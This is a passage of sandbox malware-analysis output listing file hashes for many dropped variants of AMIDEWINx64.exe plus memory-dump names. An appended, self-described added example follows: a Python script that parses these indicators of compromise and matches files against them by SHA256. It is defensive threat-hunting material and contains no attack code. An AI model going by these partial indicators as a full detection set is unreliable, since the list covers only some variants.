| SHA512 | 62c39f6ae2da9479bada027beae55f0103207be233ad3bd54b46056221b6cae6a09c2dc5fa77b13e3dfbd237017280212a2b47b0e62a6435136a37a6e2777544 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | e4f7b0f5b4e75f97843e001cfdfa49f9 |
| SHA1 | e16f03c5b7c100b43446791595697823b63e6518 |
| SHA256 | 7a3217c0e475331fe842d040c819f37a299756bff474db5425108ebc48a1fc71 |
| SHA512 | 961c55f3cc20d6719b34c931c4872ff809d504ec766a120c2dd995da2e5aacefcc5aee5781be5af5fd43b5d343d5b1fdddb736433904b66fe7eec2e99ba110e6 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 3a1967c887226322f1c249e908ec18dd |
| SHA1 | 419a6a646186ddd88c5f724b464d5dd81ef4bc75 |
| SHA256 | f9350428df91b736dd965a3084d01bec05e2f3c084f4a39890b15bab37663c5c |
| SHA512 | 232fff07351e5fe4d225980a26a7d3cfb0a43f8d1144d887c3e9b694da7e75027c912cd7ebdae34a430d68b4495505e34517400c8f841da790fcc69d7cad943e |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 440b5b55068f2dfcfd2c3bd0dff114b4 |
| SHA1 | 0fd00af7aa7709ba5954fd9102e9b37323bc575c |
| SHA256 | 9db72a1385fc6e2ae2e4868d7034e5d9d59173a3988eae648d08e2dabf7f1588 |
| SHA512 | d2431aec55d978b35a59808a5a40cfdec3de1b14c0ec5573b50b2869ea1278ce4d5985b2c0061b405f77ba9ded512877ebcec4efded601fe4005cf875f670d65 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | aa67e5b6c44aa5bd38774f608e8f48ce |
| SHA1 | d0d822803a7be363b56d601d016ffbbe2eee127e |
| SHA256 | 1ff4c9627e308c8340a28cec66e9c050dd6f104382d530cb037b09656ed2670d |
| SHA512 | 3d5c773a930042e60d5a56ed317aeb31e558092735f5924247d953e045c8643a91c57ee5e3bfefced170de98c62717324bf478e90e972558fd7c16179891d134 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | c4d09d3b3516550ad2ded3b09e28c10c |
| SHA1 | 7a5e77bb9ba74cf57cb1d119325b0b7f64199824 |
| SHA256 | 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3 |
| SHA512 | 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 29be5db653313ca26fc71fd29a9c87be |
| SHA1 | 8e94e68e9ee653801022d9b6e390a9a4d9421044 |
| SHA256 | a23ca34daf17f745e1e84bf09378868d19d82d22e3eb118596ab3ceca3c118df |
| SHA512 | 15aa7fb3bd9216495101f8656be48d8a2797106809a6c51de401ca1f8fe133caeca4c761d4db637bba1a359ab793e20f91cf33b0b5bc9b2e4baa2e1788a1bc93 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | adcab2dc127c140ca478234768c2fc05 |
| SHA1 | 2845c0ca3d0778f74a8b43dcf58a9eef71080c03 |
| SHA256 | ab875d94bb5895891b41430e6b96698e00dad1897b2403f1295d5185c13994ab |
| SHA512 | 1daf20c9ec43f83241ca004f3cabdf2c8ce889b9bc8276f68718eda337e6e719472a30b505ca27415aa299c8fbf654be3fc0319815be7f9733a6d77f7ea07846 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 75c39430eb6b002fbbbb624060196545 |
| SHA1 | 2200486859babd1f54604815b1a76f3522860eec |
| SHA256 | 6fad1b2807cd28dbfe9c1f2f65852f556a5bcecaae22b91e39b22e8b19aa4884 |
| SHA512 | fa5de7de93984ae7d223dc52d7bf95fbd5e35b266289e196540c459e00c03aa3df5e9ad5b7172163269a0eda562962c8b62697a9ac3cd6eea3c1f803f89c1bee |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 340200850de98f311bb4634553b2cf93 |
| SHA1 | 44afa4f2c13e01a296c7fd3a8fc532b31a95b29d |
| SHA256 | f3877fcb8211a032929de62bce555f443024aecc35d3db0f449169ff6768c868 |
| SHA512 | 6e48d42219e5e744d1ec57395dcb86ad7e3b8a581552f223e4d869df0c35352a562aa1e8021a57cca20960b05f03f3e38e837b935bd246e4a7a4c6e24fe439a0 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | e77632d2b67f00e8244aed09432661bd |
| SHA1 | aacf985a45e44ba92f3ebe204a3a0e3fc0436be4 |
| SHA256 | ae1b5b4e2f182b2d6978c87e5f71fb572aa235a3246220f74b8c9855fd95e864 |
| SHA512 | a5d0f61a01e088efbbe2b11ba0192a8584990cf016df4aab887070a02620f64a5907a0cd5a7408b0bbc8e38ae072074dce32c7aeab65639969f98a518aa500a7 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | fc353f2e1c1e2cc084e98df010e320b3 |
| SHA1 | b4660f49bb5ce94bdf8fb6340bfe7c82149bb4ff |
| SHA256 | 22f6ab4e41f7479308993930873a3150f0bed88fe7ec983653f967f9f3147d7d |
| SHA512 | 8470703feaea08f841e68ceb19426e23a0461ba12f63527c5b827d6976525e3277a6858ca6223d35e5dc5bc859f22608b90420df9a59d980a5acb79bd6b2c3c9 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 79d4f5cfc7ab132bc6c5e4770d76ea38 |
| SHA1 | e29002453abc0bdf1566e985e3c52ae7469aa56a |
| SHA256 | da5c6add93975ddcea4fe495670b9939f72e42f063da1d0f5d34614cfb2b541e |
| SHA512 | c76ebb824a2a4c31090139e95102693b29d421aea5a48c39f04930267795c1801d9a9740ccb630d5fdf42a877e82a3fc0de347ff8ef2f5d3ebe2ce2f297b4185 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 944f318d87acba3debc921958d57fac5 |
| SHA1 | f20fa39eee769102198e633e404feefbdc33d8ce |
| SHA256 | 079d36524f458c0ee6178834fefabc471e183024d8a6ec758b1027b0ebcb0187 |
| SHA512 | fe242ef03e00677c5bcec1c1f8e5f4dfbcba075bc8f2859e2ea3a7e062f63708562f401fd1b3dad57e18a4bd6926c4389b10b5e2f2a8626ea2b60ff04a0d3665 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 2eab29acb6c820edf699e3bb8042ec82 |
| SHA1 | 61359d4e372ad21deb5c32f9270e2cec1d767915 |
| SHA256 | bd20847ccb1ccf79b6c5d7f444fb208d212e5f3ff7a6bf45d9f6e6e2d60d261f |
| SHA512 | 7b9f0652d34ab09fb9d36c0e293db1683a9cb37cb86c87ee509828f9ba65b1be6e4cab756c4c5606af1ff0a80a9c3b8ed62fc5f64ec20d844fd3f3b09c71a155 |
memory/3412-307-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3412-309-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3412-305-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3412-306-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3412-304-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3412-303-0x0000000140000000-0x000000014000E000-memory.dmp
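The listing above is raw sandbox output: a path line followed by a four-row hash table for each dropped file, interleaved with memory-dump region names. The following script is an added example (not part of the report or of any tool the report names) that parses that layout into indexable IOC records, so the hashes can be matched against files on a suspect host rather than read by eye. The embedded sample text is three entries copied from the listing; the record and function names are the example's own, and the byte string passed to the matcher is constructed.

```python
"""Parse a sandbox dropped-files listing into IOC records and match files against it.

Added example; the layout parsed is the report's own (path line, then
"| ALGO | hex |" rows). Sample entries below are copied from the listing.
"""
import hashlib
import re
from dataclasses import dataclass, field

# Three entries copied from the dropped-files listing above, plus one memory-dump
# line, in the report's own layout.
SAMPLE_REPORT = r"""
memory/2760-170-0x000000001B430000-0x000000001B440000-memory.dmp
C:\ProgramData\Microsoft\Windows\amifldrv64.sys
| MD5 | 785045f8b25cd2e937ddc6b09debe01a |
| SHA1 | 029c678674f482ababe8bbfdb93152392457109d |
| SHA256 | 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba |
| SHA512 | 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | b35db115e3483fde6452da70eb8452c8 |
| SHA1 | f7eb27ea059531af9797d1e3515d543b4c9a387b |
| SHA256 | db33f5a9664a179534628c463866a8b34ff9e1b63dfbc9e12731400c9547b7cb |
| SHA512 | 4043718e16e60bf4333fcff8bb954224467f98e57ca9dc62ef840043b8185f7262ef9b8c4e276f94fb11ae7af9b016af37c8fa8c26e6de1ef34d6af332c7b4b1 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | f523ef3f1ba2a6625a526f355b50a508 |
| SHA1 | b07cc30507b088ebc127335be13c4b2a6edb87a4 |
| SHA256 | 088b78fe62398f46e938dc81ff0988469099747eaf08bc51cc0d4d24a252a598 |
| SHA512 | 32043009da7238b8fcb7805700a50655fe3c4325566f86b4170f392f5ba01db19de666b91424e0b20cd7c522499d2f0fa3099465cf0d3f1441501b27a7155f25 |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEMDUMP = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)


@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self):
        return self.end - self.start


def parse_report(text):
    """Return (dropped files, memory dumps). Raises on rows that cannot be trusted."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMDUMP.match(line)
        if m:
            dumps.append(MemoryDump(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None  # a hash row may not follow a dump line
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m[1], m[2].lower()
            if current is None:
                raise ValueError(f"hash row without a preceding path: {line}")
            if len(digest) != HEX_LEN[algo]:  # truncated/garbled copy of a digest
                raise ValueError(f"bad {algo} length for {current.path}: {digest}")
            current.hashes[algo] = digest
            continue
        current = DroppedFile(line)  # any other line starts a new file record
        files.append(current)
    return files, dumps


def index_by_hash(files):
    """Map (algorithm, digest) to every record carrying it; hunting keys on hashes, not paths."""
    idx = {}
    for f in files:
        for algo, digest in f.hashes.items():
            idx.setdefault((algo, digest), []).append(f)
    return idx


def lookup(idx, algo, digest):
    """Paths recorded under a known digest (sorted, de-duplicated)."""
    return sorted({f.path for f in idx.get((algo, digest.lower()), [])})


def match_bytes(idx, data):
    """Paths whose recorded SHA256 equals the SHA256 of data (SHA256 only: MD5/SHA1 are collision-prone)."""
    return lookup(idx, "SHA256", hashlib.sha256(data).hexdigest())


def variants_per_path(files):
    """How many distinct SHA256 values were dropped under each path."""
    seen = {}
    for f in files:
        seen.setdefault(f.path, set()).add(f.hashes.get("SHA256"))
    return {p: len(s) for p, s in seen.items()}
```

Indexing by digest rather than by path matters here because the same path (AMIDEWINx64.exe, DevManView.exe, conhost_sft.exe) appears many times with different hashes, so a path-based rule would miss most of the written variants. Only the SHA256 match is treated as authoritative; an MD5 or SHA1 hit alone should be confirmed against the stronger digest before it is acted on.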